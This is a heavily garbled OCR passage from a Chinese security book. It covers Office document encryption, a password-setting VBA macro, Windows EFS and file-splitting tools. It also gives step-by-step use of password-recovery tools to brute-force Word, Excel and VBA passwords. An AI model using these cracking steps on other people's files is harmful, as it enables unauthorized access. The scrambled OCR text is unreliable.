提示 正在 解密 中 。 单 击 “ 确 定 ” 按 钮 。 
STEP05: 返回 主 界 面 


3 Word Password Recovery Master 
Flle Help 





Word document name 
于 D:\Documents\trhsh (Fixed). bak. doc 


Word document passwords 


"Dpen” password: 


"Write”™ 

"Frotection”™ 

出 现 已 经 解密 的 文档 链接 ， 单 击 此 链接 ， 即 可 打开 
文档 查看 内 容 。 


Dpen document in Microsoft Word 








8.2.5 ”EXCel 文件 
Microsoft Excel 2013 除了 提供 加 密 文 档 功能 ， 还 提供 了 保护 工作 表 、 保 护 工 作 短 等 功 
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售 人 他 他 





窜 


> 
攻防 从 入 门 到 精通 





能 ， 用 户 可 以 使 用 这 些 功 能 来 对 Excel 文档 进行 保护 ， 以 防止 他 人 进行 颖 探 修 改 。 


1. 使 用 “和 冲 规 选项 ”进行 加 密 





Excel 2013 中 的 “名 规 选 项 ” Word 中 的 该 项 功能 相似 ， 都 是 对 打开 文档 和 修改 
文档 同时 进行 加 密 。 有 具体 的 操作 步 
打开 Excel 2013 


骤 如 下 。 
STEP01: 





引 Android 应 用 逆向 分 析 
10| 微 信 公 众 皇 台 开发 宗 例 精 闻 
“11| 网 站 数据 分 析 : 技术 、 方 法 与 实践 
12| 网 站 数据 分 析 : 经 绒 案 例 解析 
4 | 13| 网 站 分 析 师 应 该 知道 的 97 件 事 
d | 14| 网 站 分 析 师 修炼 之 道 
1d ”15|R 语 言 与 数据 分 析 





闭 打开 要 加 密 的 文件 。 国 单 击 “文件 " 菜单 项 。 
STEP03: 打开 “另存 为 ”对 话 框 


另存 为 


大 
OO- 用 * 本 地 磋 走 (E:) ， 2014 选 杆 新 建文 件 夫 (2) = | 好 | 算 疾 厅 芝 CSX 关 加) 


文件 名 (N): 选 是 ,xlsx 
保存 党 型 (T): | Ekcel 工作 簿 (*.xlsx) 
作者 : sq 





辐 保 存 缩 略图 








圆 设置 保存 位 单 击 “ 工 具 ” 按 钮 ， 在 下 拉 
置 和 文件 名 称 。 ”菜单 中 选择 “常规 选项 " 选项 。 
STEP05: 确认 密码 








输入 打开 权限 单 击 “ 确 定 " 
密码 。 按钮 。 
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STEP02: 打开 “信息 ”窗口 


保护 工作 簿 


控制 其 他 人 可 以 对 此 工作 簿 所 做 的 更 改 类 型 。 


检查 工作 簿 


在 发 布 此 文件 之 前 DE 
日 残 短 人 十 仅 以 阅读 的 内 
保存 文件 时 ， er 息 的 设置 
人 允许 插 此 信息 保存 在 您 的 文件 中 


版 本 


村 ] 找 不 到 此 文件 的 上 一 个 版 本 。 


浏览 器 视图 选项 
选择 在 Web 上 查看 此 工作 簿 时 用 户 可 以 看 到 的 内 
容 . 


单 击 “另存 为 ”选项 。 


STEP04: 打开 “常规 选项 ”对 话 框 
常规 选项 | lm 
回 生成 备份 文件 [四 
文件 共享 
打开 权限 密码 (QO): |** 
修改 权限 密码 (M): | *** 











癌 建议 愉 读 (R) 





分 别 在 “打开 权 根 密码 "和 “修改 权限 密码 "文本 框 
中 输入 相应 的 密码 后 ， 单 击 “ 确 定 ” 按 钮 。 
STEP06: 确认 密码 











输入 修改 权 加 单 击 “ 确 定 ” 
限 密码 。 按钮 即 可 。 


= 第 3 章 
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2. 使 用 强制 保护 功能 
Microsoft Excel 2013 目 市 的 强制 保护 功能 ， 可 以 保护 Excel 文档 中 的 工作 表 、 工 作 狂 
不 被 修 改 。 有 其 体 的 操作 步骤 如 下 。 


STEP01: 打开 Excel 2013 STEP02: 打开 “保护 工作 表 ” 对话 框 





i ei a ”2 保护 工作 表 | lm 


笨 自转 简 记 J] 
Ls Cc 
村 - 
拼写 检查 信息 检索 同义词 让 “各 半生 新 建 批注 SR 
条 简 繁 针 欣 = [ 蕊 呈 寺 时 迹 





保护 工作 表 及 锁定 的 单元 格 内 容 (C) 


到 灌 工作 表 保 护 时 使 用 的 密码 (P): 
| 


校对 中 文 简 繁 转 换 。 证言 批注 
太 ，R 语 言 与 数据 分 析 : 实用 案例 解析 











Sheet1 Sheet2 Sheet3 





在 “审阅 ”选项 卡 单 击 “ 保 护 工作 表 ” 按 钮 。 输入 勾 选 。 国 单 击 “ 确 
密码 。 定 ” 按 钮 。 
STEP03: 确认 密码 STEP04: 返回 主 窗口 


C? 5 
开始 插入 页 面 布局 公式 数据 
A 箱 繁 转 简 > > qe 
夫 也 国 访问 
翻译 『「 休 尘 放 


&& 简 转 繁 
拼写 检查 信息 检索 同义词 库 “> 
培 











输入 打开 权限 密码 。 ” 国 单 击 “确定 ”按钮 。 单 击 “ 保 护 工作 得 ”按钮 。 


STEP05: 保护 结构 和 窗口 STEP06: 返回 主 窗口 


围 四 所 他 s 先是 xlsx - Microsol 党 口 
区 开 抬 。 括 入 ”页面 布局 。 公 阅 sa EA 
EP EC | Ly 二 一 - 
撞 写 检 去 信息 检索 同 义 酒 库 。 = 。 一 ”Pa Gh 

从 简 繁 转 基 工作 夺 fn zs 了 
中 文 简 繁 转运 。 语言 更 改 


局 | 结构 (&) 
窗口 (W) 


天 | RR 语言 与 数据 分 析 : 详 用 案例 解析 








密 始 (可 选 )(P): 


宽 误 宾 








9|Android 应 用 逆向 分 析 
A 
11 | 网 站 数据 分 析 ; 技术 、 方 法 与 林 另 
12| 网 站 数据 分 析 ; 经 奖 宗 例 解析 


Sheeti Sheet2 Sheet3 


设置 密码 ， 单 击 “确定 ” 按 钮 ， 即 可 实现 对 工作 筹 单 击 “保护 并 共享 工作 簿 ”按钮 。 








的 保护 。 
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;a > 





新 


全 人 人 他 
STEP07: 打开 “保护 共享 工作 簿 ”对 话 框 
保护 共享 工作 矫 | | 人 | 


保护 工作 簿 
以 跟踪 修订 方式 共享 (9) 
用 此 方法 可 以 共享 工作 短 ， 并 过 免役 失修 订 记 录 。 


如 要 设置 密码 ， 必须 在 此 时 进行 ， 即 在 将 工作 敌 共 享 之 前 进行 。 设置 保护 密码 ， 单 击 “ 确 定 ” 按 钮 ， 即 可 实现 对 共 
坦 选 }(P);: i wy 
人 1| 享 工作 簿 的 保护 。 











3. Excel 文件 解密 
“办 公文 件 密 人 码 恢复 程序 ”是 一 蒜 国 产 密码 恢复 软件 ， 它 可 以 恢复 Microsoft Office 应 用 程 
友 加 密 的 文件 ， 如 Word、Excel 等 文档 的 密码 。 如 果 没 有 进行 注册 ， 则 只 能 破解 4 位 密码 。 
使 用 该 工具 恢复 Excel 文档 的 基体 操作 步骤 如 下 。 
STEP01: ”打开 “办 公文 件 密码 恢复 程序 ” STEP02: ”成功 添加 Excel 文件 








水 办公 文件 富 玛 恢复 程序 2-0 版 加 图 村 务 办 公文 件 窜 码 恢复 程序 2-0 版 
文件 区 ) 编辑 区 ) 运行 区 ) 帮助 0 文件 @) 编辑 区 ) 运行 @) 必 助 Q{) 


pi x 





选择 以 下 合适 字符 作为 测试 密码 (此 项 选择 影 只 恢 复 速度 及 有 水 性 ) 


iabcdefehijkimoparstuwwayd 区 012345678 厂 空格 厂 空格 





厂 ABCDEFGHIJTELINOPARSTUYWYZ 厂 {< = =+N| 厂 ABCDEFCHIJTIHLIOOPQRSTUWWYZ 厂 {< 厂 上- = 人 | 


厂 自 定义 |[ 在 此 输入 自 定 义 字符 ， 可 以 是 冯 字 | 厂 自 定义 |[ 在 此 得 入 自 定 义 字 符 ， 可 以 是 汉字 ] 


恢复 密码 恢复 密码 


密码 位 数 : 从 上 及 了 到 [15 7| 位 使 用 时 间 : 密码 位 数 : 从 11 7| 到 [6 可 位 使 用 时 间 : 
密码 ，| 0 oi eer a | : | | | 


mn) | td Tt 4 
5 分 未 注册 (2010-5-6| 区] cov ; | | 2010-5-6 [ET tt:18 
单 击 “ 打 开 ” 按钮 后 ， 在 “打开 ”对 话 框 中 选择 需要 查看 已 添加 的 Excel 文 件 。 


破解 的 Excel 工 作 薄 ， 单 击 “ 打 开 ” 按 钮 。 





























STEP03: 开始 恢复 STEP04: 密码 恢复 成 功 


务 大公 文件 密码 恢复 程序 2-0 版 
文件 区 ) 编辑 甘 】 运行 区 ) 帮助 0 


也 | 鲜 





2@ 


: ‘Documen 


密码 位 数 : 从 |1 | 到 | -| 位 
密码 : | 0 




















设置 密码 组 合 的 字符 、 密 码 长 度 ， 单 击 “ 开 始 恢复 ” 如 果 找 到 密码 ， 则 可 看 到 “恢复 成 功 ” 对 话 框 ， 其 
按钮 ， 即 开始 破解 。 中 显示 该 Excel 文 档 的 密码 。 
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8.2:6 ” 宏 加 密 解 密 技术 


在 Microsoft Office 套件 中 内 和 散 了 一 个 Visual Basic 编辑 器 ， 它 是 宏 产 生 的 源 果 。 
使 用 宏 ， 同 样 可 将 Word、Excel 文档 进行 加 密 。 对 Word 文档 而 言 ， 最 大 的 “敌人 ” 
当然 焉 是 安 病 毒 了 。 

1. 使 用 宏 进 行 加 密 

在 Word 里 针对 宏 病 毒 进行 防范 设置 的 操作 十 分 人 简单， 选择 “工具 ”> “ 宏 ”> “ 安 
全 性 ” 采 蠕 命令， 打开“ 安全 性 ”对 话 框 ， 确 你 选中 “高 ”或 “中 ” 单 选 按钮 ， 如 下 图 所 
未。 这 样 ， 以 后 每 打开 一 个 文档 ， 系统 都 会 检查 它 的 数学 签名 , 一 旦 发 现 是 不 明 来 源 的 宏 ， 
即将 它 置 之 “ 门 ” 外 。 




















个 非常 高 。 号 允许 运行 安装 在 受信 性 位 置 的 宏 。 所 有 其 他 签署 了 
9 非 兴 训 。 晤 个 这 训 信 帘 半 这 信任 位 置 的 声 。 所 有 其 他 和 轩 的 


® 只 允许 运行 可 靠 来 源 签署 的 宏 ， 未 经 营 轩 的 宏 会 自动 取消 


加 中 。 您 可 以 选择 是 百 运 行 可 能 不 安全 的 宏 如 )。 


Re 
证， 到 2 








“安全 性 ”对 话 框 

另外 , 为 阻止 可 和 恶 的 宏 病毒 在 打开 文件 时 目 动 运行 并 产生 危害, 可 以 在 打开 一 个 Office 
文件 时 ， 很 容易 地 阻止 一 个 用 VBA 写成 的 在 打开 文件 时 目 动 运行 的 宏 的 运行 。 

选择 “文件 ”>“ 打 开 ” 菜 单 命令 ， 在“ 打开” 对话 框 中 选择 文件 名 ， 在 单 击 “ 打 
开 ” 按 钮 时 按 住 〈Shift〉 键 ，Office 将 在 不 运行 VBA 过 程 的 情况 下 打开 该 文件 。 按 住 
《Shift》 键 阻 止 宏 运行 的 方法 ， 同 样 适用 于 打开 “文件 ” 染 单 中 底部 的 文件 《最近 打 开 
的 儿 个 文件 )。 

同样 , 在 关闭 一 个 Office 文件 时 , 也 可 以 很 容易 地 阻止 一 个 用 VBA 写成 的 将 会 在 关闭 
文件 时 自动 运行 的 宏 的 运行 。 从 中 选择 “文件 ”>“ 关 闭 ” 末 单 命令 ， 在 早 击 “关闭 ”按钮 
时 按 住 〈Shift〉 键 ，Office 将 在 不 运行 VBA 的 情况 下 关闭 这 个 文件 ( 按 住 《Shift〉 键 同样 
适用 于 在 单 击 窗口 右上 角 的 “关闭 ”按钮 天 财 文 件 时 阻止 宏 的 运行 )。 其 实 ， 还 可 以 利用 宏 
来 目 动 加 密 文档 ， 选 择 “ 工 具 ”>“ 宏 ”>“ 宏 ”及 单 命令 ， 即 可 打开 “ 宏 ” 对 话 框 ， 如 下 
图 所 示 。 
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半 河 [ 


售 人 他 他 


| | 
2 攻防 从 入 门 到 精通 


宏 铝 是 ) : 








单 步 执行 (3) 


[编辑 @) | 


创建 €) 
宏 的 位 置 和 &) | 所 有 的 活动 模板 和 文档 了 


说 明代 ): 
“ 宏 ” 对 话 框 
在 “ 宏 名 ”文本 框 中 输入 “AutoPassword” 之 后 ， 在 “ 宏 的 位 置 ” 下 拉 列 表 杠 中 选择 
“所 有 的 活动 模板 和 文档 ”选项 ， 再 单 击 “创建 ”按钮 ， 即 可 显示 “Microsoft Visual 
Basic-Normal” 窗 口 ， 如 下 图 所 示 。 


Microsoft Visual Basic - Normal 








| Ee Mierosoft Word 对 象 | | ( 盘 用 ) | ee 
| 日 -全 模块 Sub MutoPassword() 
: EE Hewhacros 

AutoPassword Macr 


3 i en -| clsevers 
日- 祥 Microsoft Word 对 象 ， 宏 在 2013712718 由 Tcl 创建 


:全 ] ThisDocument 


| | 
田 稳 | 引用 End Sub 


上 


Te 
按 字母 序 | 按 分 类 序 | 


[名称 ) 





“Microsoft Visual Basic-Normal” 窗口 


在 “End Sub” 语 句 的 上 方 插 入 如 下 代 公 : 
With Options 
.AllowFastSave = True 
.BackgroundSave = True 
.CreateBackup = False 
.SavePropertiesPrompt = False 
.SavelInterval = 10 


.SaveNormalPrompt = False 
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密码 攻防 


End With 
With ActiveDocument 
.ReadOnlyRecommended = False 


.EmbedTrueTypeFonts = False 


.SaveFormsData = False 
.SaveSubsetFonts = False 
.Password = "2014" 
.WritePassword = "2014" 
End With 


Application.DefaultSaveFformat = "" 


其 中 的 “.Password = "2014"” 表 示 设 置 打 开 权 限 窒 码 ,，“.WritePassword = "2014"” 表 
未 设置 修改 权限 密码 。 在 输入 完 上 述 代码 之 后 ， 选 择 “ 文 件 ”>“ 保 存 Normal” 闲 单 命令 ， 
再 关闭 并 人 返回 到 Microsoft Word 即 可 。 

2. 解除 宏 密 码 

VBA Key 是 一 丈 专 门 用 于 为 经 过 宏 加 密 的 Office 文档 解密 的 工具 , 其 操作 界面 如 下 
图 所 示 。 其 操作 方法 非常 和 测 单 ， 上 只 需 单 击 “Recover” 投 钮 ， 在 “Recover” 对 话 框 中 选 
择 需 要 破解 的 文档 。 单 击 “ 打 开 ” 按 钮 ， 即 可 按照 用 户 设置 好 的 条 件 进行 破解 。 在 找到 
密码 之 后 ， 将 给 出 具体 提示 信息 。 

















- 避 ” 少 加 


Recover Support Order Stop 


VBA Key recovers passwords for office documents with VBA module. 
Browse (Ctrl+O) for the file, select from recent files |ist or drag the file to this window to 
start recowvery. 


Demo version recovers passwords that are not longer than 2 charscters. 


Clic Order toclbar button er Visit http:i wwe.LostPassword.com to purchase fully 
functional wersien. 





VBA Key 操 作 界 面 


8.2.7 NIR 文件 系统 加 客 效 据 


Windows 7 提供 了 内 置 的 加 蜜 文件 系统 (Encrypting File System，EFS)。EFS 文件 系统 
不 仅 可 以 阻止 入 侵 者 对 文件 或 文件 夹 对 象 的 访问 ， 而 且 保持 了 操作 的 便捷 性 。 加 密 文件 系 
统 通过 为 指定 NTFS 文件 与 文件 夹 加 密 数 据 ， 从 而 确保 用 户 在 本 地 计算 机 中 安全 存储 重要 
数据 。 由 于 EFS 与 文件 集成 ， 因 此 对 计算 机 中 重要 数据 的 安全 保护 十 分 有 益 。 
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加 > 





Pe 
所 各 
加 密 操作 

利用 Windows 7 资源 管理 喜 选 中 不 

文件 夹 ”)。 对 该 文件 进行 加 密 的 其 体操 作 步 
STEP01: 选择 要 加 密 的 文件 夹 

包含 到 库 中 加 
入” 通 9QQ 发 兰 到 6 的 手机 





大 Spybot - Search & Destroy 
上 发送 到 (N) 
莫 切 人 T) 
怎 制 (C) 


创建 快捷 方式 (5) 
删除 (D) 
重 命 名 (M) 





证 第 13 昌 
9 黑客 功 








右 击 要 加 密 的 文件 来， 从 快捷 菜单 中 选择 “属性 


人 和 全 全 
DD xo 


STEP03: 查看 高 级 属性 


Dy a 
[1 mr 55 6 939 日 
贡生 
存档 和 索引 属性 

回 可 以 存档 文件 来 内 

团 除 了 文件 属性 外 ， 还 允许 达 引 此 文件 夹 中 文件 的 内 容 上) 


压 纠 或 加 室 属 性 
站 压缩 内 容 以 便 节 省 磁盘 空间 作 ) 


加 密 内 容 以 便 悍 护 数据 全 ) 


证 


勾 选 “加 密 内 容 以 便 ” 立 单 击 “ 确 定 ” 按 钮 。 
保护 数据 ” 复 选 框 。 


STEP05: 确认 属性 更 改 


您 已 经 选择 对 属性 进行 以 下 更 改 ; 
加 密 


和 咕 吕 四 检 A 或 者 是 天 要 将 它 应 用 于 所 有 子 广 
局 你 将 更 改 应 用 于 此 文件 来 
加 将 更 改 应 用 于 此 文件 夹 、 子 文件 夹 和 葡 件 


国 选择 加 密 回 单 击 “ 确 定 ” 
应 用 范围 。 按钮 。 











攻防 从 入 门 到 精通 





寺 设 置 加 密 属 性 的 文件 或 文件 夹 〈 如 文件 夹 为 “新 建 
又 如 下 。 


STEP02: 查看 新 建文 件 夹 属性 


常规 ”| 安全 | 以 前 的 版 本 





新 建文 件 夹 


只 读 ( 避 应 用 于 文件 夹 中 的 六 件 ) 色 
回 隐藏 o 


应 用 局) 


单 击 “ 常 规 ” 选 项 卡 中 的 “高 级 ”按钮 。 


STEP04: 返回 “新 建文 件 夹 属性 ”对 话 框 





以 前 的 版 本 | 自 定 区 





新 建文 件 来 


贺 口 读 
同 隐 藏 0 


( 避 应 用 于 区 件 来 中 的 文件 ] (R) 


单 击 “ 确 定 ” 按 钮 。 


STEP06: 查看 已 加 密 的 文件 夹 


本 地 磁盘 (Ej] 新 建文 件 夫 计算 机 类 ， 黑客 攻防 实战 从 入 门 到 
工具 (T) 帮助 (H) 


含 齐 库 中 Y 电子 邮件 ”新 建文 件 去 








中 


a ee oft 











加 密 后 的 文件 夹 字 体 变 为 绿色 。 
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2. 解密 操作 
利用 Windows 


例 )， 上 其 体 的 操作 步 又 如 下 。 


STEP01: 选择 已 加 窗 的 文件 夹 
得 仿 到 六 中 四 


通过 QQ 上 发送 如 后 的 手机 
时 Spybot - Search & Destroy 
发 送 到 (N) 


第 10 章 网 络 黎 
骗 与 安全 防范 莫 切 人 T) 
doc 复制 (C) 


创建 快捷 方式 (S) 
删除 (D) 
重 命名 (M) 





密码 攻防 








7 资源 常理 亏 选 中 竺 解密 的 文件 或 文件 夹 〈“ 仍 然 以 刚才 加 蜜 的 文件 夹 为 


STEP02: 查看 新 建文 件 夹 属性 


常规 。 | 安全 | 以 前 的 版 本 
新 建文 件 赤 





只 谋 ( 避 应 用 于 文件 来 中 的 文件 ) (R) 





石 击 已 加 密 的 文件 夹 ， 从 快捷 菜单 中 选择 “属性 ” 
AAA 
DD xo 


STEP03: 查看 高 级 属性 


EE 汉 作 在 天才” 对话 桂 中 单 二 ° 


和 


存档 和 索引 属性 
可 以 存档 文件 来 各 ) 


除了 文件 属性 外 ， 还 爷 许 索引 此 文件 来 中 文件 的 内 容 I) 


压 爱 或 加 密 属 性 
[| 压缩 内 容 以 便 节 省 磁盘 空间 站 ) 


器 | 加 密 内 容 以 便 保 护 数据 多 ) 


详细 信息 0) 


取消 义 选 “加 密 内 容 以 单 击 “确定 " 
便 保护 数据 ” 复 选 框 。 按钮 。 
STEP05: 打开 “确认 属性 更 改 ” 对 话 框 


您 已 经 选择 对 属性 进行 以 下 更 也: 
解密 


否 要 将 此 更 改 仅 应 用 于 此 文件 夹 ， 或 者 是 否 要 将 它 应 用 于 所 有 子 文 
作 呈 四 0 


局 如 将 更 改 应 用 于 此 文件 来 


选择 解密 国 单 击 “ 确 定 " 
应 用 范围 。 按钮 。 











单 击 “ 弟 规 ” 选 


项 卡 中 的 “高 级 ”按钮 。 


STEP04: 返回 “新 建文 件 夹 属性 ”对 话 框 


常规 “| 安全 | 以 前 的 版 本 
上 新 建文 件 赤 








创建 时 间 : 2013 年 11 月 19 日 ， 10:16:22 





属性 : 品读 ( 避 应 用 于 训 忻 夹 中 的 训 件 ) R) 
回 隐 藏 00 


单 击 “ 确 定 ” 按 钮 。 


STEP06: 查看 已 解密 的 文件 夹 


本 地 磁盘 (E:) ， 新 建文 件 去 ， 计算 机 类 ， 墨客 攻防 实战 从 入 门 避 
工具 (T) 帮助 (H) 


含 到 库 中 Y 电子 邮件 新 建文 件 夫 








i 


新 建 Microsoft 
Word 97 - 2003 
文档 (2).files 


第 1] 童 从 委 开 始 
认识 是 宕 ,doc 


已 解密 的 文件 夹 字体 重新 变 为 黑色 。 
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二 = | 

取 = > 
用 攻防 从 入 门 到 精通 
小 全 人 人 他 





当然 ， 在 进行 加 密 / 解 密 操 作 时 ， 也 应 注意 如 下 几 点 要 求 。 
1) 不 能 加 密 或 解 客 FAT 文件 系统 中 的 文件 与 文件 夹 ， 而 只 能 在 NTFS 格式 的 磁盘 分 


区 上 进行 此 操作 。 
2) 加 密 数据 只 有 存储 在 本 地 磁盘 中 才 会 被 加 密 ， 而 当 其 在 网 络 上 传输 时 ， 则 不 会 
加 密 。 








3) 已 加 复 文 件 与 普通 文件 相同 ， 也 可 以 进行 复制 、 移 动 以 及 重 命名 等 操作 ， 但 是 其 操 
作 方 式 可 能 会 影响 加 密 文 件 的 加 密 状 态 。 

3. 复制 加 密 文件 

在 Windows 7 资源 定 理 右 中 选中 每 复制 的 加 密 文 件 ， 右 击 该 加 密 文件 并 从 快捷 末 
单 中 选择 “复制 ”命令 。 切 换 到 加 密 文 件 复制 的 目标 位 置 并 右 击 ， 从 快捷 末 单 中 选择 
“粘贴 ”命令 即 完成 操作 。 可 以 看 出 ， 复制 加 密 文 件 同 复制 普通 文件 并 没有 不 同 。 只 是 
进行 复制 的 操作 者 必须 是 被 授权 用 户 。 别 外 ， 加 和 突 文 件 被 复制 后 的 副本 文件 ， 也 是 被 
加 密 的 。 

4. 移动 加 密 文件 

在 Windows 7 资源 管理 絮 中 选中 每 移动 的 加 密 文 件 ， 右 击 该 加 密 文 件 并 从 快捷 亲 蛙 中 
选择 “ 酿 切 ” 亲 单 项 , 再 切换 a 到 加 密 文 件 每 移动 的 目标 位 车 并 右 击 ， 从 快捷 末 单 中 选择 “ 烽 
贴 ”菜单 项 即 完 成 移动 操作 。 
































对 加 密 文 件 进行 复制 或 移动 时 ， 由 于 复制 或 移动 到 FAT 文件 系统 中 时 文件 自 


动 解密 ， 因 此 在 对 加 密 文 件 进行 复制 或 移动 后 应 重新 进行 加 密 。 





8.3 ”文件 和 文件 夹 密码 攻防 


文件 和 文件 夹 是 计算 机 磁盘 空间 中 为 了 分 类 存储 电子 文件 而 建立 的 独立 路 径 的 目录 ， 
“文件 夹 ” 束 是 一 个 目录 名 称 。 文 件 来 不 但 可 以 包含 文件 ， 而 且 可 以 包含 下 一 级 文件 来。 为 
了 保证 文件 夹 的 安全 ， 还 需要 给 文件 或 文件 夹 进行 加 密 。 


8.3 文件 分 割 巧 加 密 


为 保证 文件 的 安全 ， 可 以 将 其 分 割 成 几 个 文件 ， 并 在 分 割 的 过 程 中 进行 加 密 ， 这 样 黑 
客 面临 分 割 后 的 文件 就 束手无策 了 。 在 本 布 将 介绍 两 坎 常 见 的 文件 分 割 工 具 。 

1. Fast File Splitter 

文件 分 割 工具 Fast File Splitter 可 把 大 文件 快速 分 割 成 小 部 分 ， 以 便于 携 市 或 用 
E-Mail 发 送 。 它 文 持 目 定义 分 割 文 件 的 大 小 和 数量 , 支持 创建 日 解压 格式 的 分 割 文件 包 ， 
文 持 数据 包 的 加 密 功 能 。 

使 用 Fast File Splitter 软件 分 割 和 合并 文件 的 其 体操 作 步 又 如 下 。 
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STEPO1: 


鸣 Fast File Splitter 


运行 Fast File Splitter 软件 


Souree and Destination Files 
Source file: 


加 Maintain vriginal file ex- 


Destination 


Destination base 
Splittine Style 


i 人 Removable 
By Sire ()By Files Humb 


media quick 


1.44 MB FLoppy ™ 
SFX Dptions 


Files size: 1350 加 了 

Splittine Dptions 

[treate a self extractine 

Encrypt? 

回 Conpress [SLOW -~ but produces smaller fil 


REGISTER HERE 





打开 “Fast File Splitter” 主 界面 。 
STEP03: 切换 至 “Split” 选项 卡 
(BB Fast File Splitter 

Split | Join 


Dptions 


黑 工 县 使 用 详解 准 \tonper40. rar 
反 黑 工具 使 用 详解 \ 新 建文 件 夹 


S_tonper40 








Source file. 


Destination 





Destination base 国 Waintain original file ex: 


Encryption 


图 co press (SLOW - but produces smaller fil 


REGISTER HERE 


i 


设置 来 源 文件 、 目 “ 国 匀 选 “Encrypt? " 复 选 框 ， 
标 文件 夹 、 目 标 基 
并 称 、 分 割 类 型 。 


STEP05: 查看 分 害 








入 密码 , 单 击 “Split” 按 钮 。 
后 的 文件 








GO 《 反 黑 风暴 一 一 黑客 与 反 .。 ， 新 建文 件 夫 EL 
文件 (有 ”编辑 (E) ”可 看 VM) 工具 (T)” 才 助 (H) 
新 建文 件 闪 








组 织 ~ 包含 到 库 中 ~ 


S_tonper40.000 S_tonper40.001 


打开 设置 的 目标 文件 夹 ， 在 其 中 可 看 到 分 割 后 的 
ho 





准 ”在 “Encryption" 文 本 框 中 输 





ei 在 “Files "文本 按钮 ， 


密码 攻防 


STEPO2: 


(BB Fast File Splitter 


Dptions 


General Dptions 


切换 至 “Options” 选 项 卡 


加 Delete orlglnal file after split 上 
Delete all split files atter merge 上 


Dptimization Options 
Note: Don t chanee this value if you don t lmow what 
加 Disable ere file checks [speeds up the splittirg and j 
Buffer Size 500 Average Disk Transfer 25 NB/Second 


Process | i 


Encryption Dptions 
Use Blowfish encryption (SLOW - but hard t， 


Use a sinple encryption (FAST - but easier 








分 别 对 常规 选项 、 优 化 选项 
STEPO4: i 分 害 


、 加 密 ; 选项 等 进 和 本 设置 。 


splitting complete. 





单 击 “ 确 定 ” 按 钮 。 


STEP06: 返回 “Split” 选 项 卡 


[BB, Fast File Splitter 





Splittine Style 


Removable 
©) By Files Humb 


media i ck 


1.44 WE [1.44 MB Floppy ”| v 


By Size 
Files 引 





eqsrenhene [Eee| 





“By Files Numb 一 一 一 单 击 “Split 
按 文件 的 
框 中 输入 每 个 分 割 文 件 包含 数量 进行 分 割 。 


的 文件 数目 。 
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取 RD 





NTZ Pe > 
全- 攻防 从 入 门 到 精通 





本 个人 人 他 
STEP07: 切换 至 “Join” 选 项 卡 STEP08: 输入 窗 码 
趾 Fast File Splitter I [Enter Encryption Password 


Meree Files 


Source file: 办 只 ‘新 建交 件 夹 \S_tonper40. 000 


Encryption password: eee| 
Destination 反 黑 工具 使 用 详解 “新建 文件 夹 





输入 设置 的 加 密 密 码 ， 单 击 “OK” 按 钮 ， 即 可 合 





设置 来 源 文件 单 击 “Join?” 

已 分 割 的 文件 。 
和 目标 文件 夹 。 按钮 。 . oe 
STEP09: 合并 完成 
| Fast File Splitte | 


Split | Join [Dptions| 
Meree Files 


Source file: 界 几 \ 新 建文 件 夹 \S_tonper40. 000 
Destination 反 黑 工具 使 用 详解 少 \ 新 建文 件 夫 


File informatior. 








Base filename: 
Dutput filename: 
Total sire: 
Encrypted? 
Compressed? 

CRC check? 


在 “Success” 对 话 框 中 单 击 “ 确 定 ” 按 钮 。 














2. Chop 分 割 工具 

Chop 分 割 工 具 使 用 普通 窗口 或 癌 导 界面 ，Chop 能 够 按照 用 户 想 要 的 文件 数量 ， 最 大 
文件 大 小 分 割 文件 。 也 可 以 使 用 预 设 的 用 于 电子 邮件 、 软 盘 、Zip 和 一、CD 等 的 通用 大 小 分 
割 文 件 。Chop 能 以 同 导 或 普通 弄 面 驶 分 和 合并 文件 ， 并 支持 保留 文件 时 间 和 属性 ， CRC、 
命令 行 操 作 甚 至 简 蛙 加 密 。 

使 用 Chop 分 割 和 合并 文件 的 其 体操 作 步 坚 如 下 。 
STEP01: 运行 Chop.exe STEP02: 加 窖 文件 














要 辟 分 /合并 的 文件 

未 选中 文件 

无 允 件 XX 字 节 | 选择 = 38, 348, 556 字 节 
描述 














大 小 |900 : | 








打开 “Chop” 对 话 框 。 国 选 择 国 色 选 " 加 国 设置 0 有 
文件 。 ” 密 ” 复 选 框 ”输出 的 。 始 辟 分 "按钮 。 
并 设置 加 密 ”目标 位 
密码 。 置 。 
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密码 攻防 


STEP03: 分 割 完成 STEP04: 打开 输出 文件 夹 


GO , HENn ， 本 硬盘 rH ef 
文人 (P 编辑 (E) 埋 看 (V) ”工具 (T) 帮助 (H) 
组 织 ” 包含 到 库 中 ”新 建文 件 夫 





论 齐 
0002.chp 


0009.chp 


单 击 “继续 ”按钮 ， 即 可 返回 主 界面 。 加 


花 才 
0012, balks 0013.chp 0014.chp 0015.chp 















STEP05: 使 用 向 导 臂 分 文件 STEP06: 打开 “选择 文件 ”对 话 框 
Chop 吧 | | 是 a 选择 妆 件 





要 辟 分 /合并 的 文件 

未 选中 文件 
无 文件 XXX 字 节 
输出 目标 位 置 





欢迎 使 用 Chop! 


Chop 是 一 个 易于 使 用 轻便 快速 的 文件 分 割 程序 . 
它 的 首要 功能 只 是 分 割 文件 以 供 分 点 ,但 是 在 分 割 形态 下 
某 些 文件 也 是 可 用 的 , 所 有 其 它 文 件 必须 在 使 用 前 先 重新 组 合 ， 


| 同名 文件 来 


选择 要 器 分 或 合并 的 文件 





| C :Wsers \Administrator \Desktop 


F:\ 痪 料 \ 公 司 图 库 \ 窗 模 ,rar 











Ss 
单 击 “ 选 择 ” 按 钮 国 单 击 “下 一 步 
Ti I 披 昌 。 然后 选择 要 劈 分 的 文件 。 按钮 。 
STEP07: 打开 “和 辟 分 模式 ”对 话 杠 STEP08: 打开 “这 样 目标 位 置 ”对 话 杠 


劈 分 /合并 的 文件 存 铺 位 置 


名 电子 邮件 (3800KB) © 加 桌面 

辐 软盘 (1.3MB) Er 加 与 来 源 文件 相同 目录 

名 超级 软盘 (100MB) 辐 在 桌面 上 创建 同名 的 文件 来 

®) zip 100 (99MB) 加 按 南 加 在 选中 文件 来 中 创建 同名 的 文件 来 
© Zip 250 (245MB) FF 加 选中 

加 zip 750 (745MB) 
全 74 分钟 CD (645MBY 


辣 80 分 钟 CD (599MB) \ 必 司 图 库 \ 花 并 
一 一 


KE- 二 = 琴 w | |[ 可 “EE 
LU eee 


设置 分 发 /存储 方式 , 此 单 击 “ 下 一 步 ” 国 选 中 "在 选中 国 单 击 "选择 " 国 单 击 “ 下 


门 目标 位 置 在 可 移动 媒体 上 . (例如 : 软盘 .) 











处 选择 "Zip 100 (99MB)”。 按钮 。 文件 夹 中 创建 同 ” 按钮， 设置 劈 分 一 步 ” 按 钮 。 
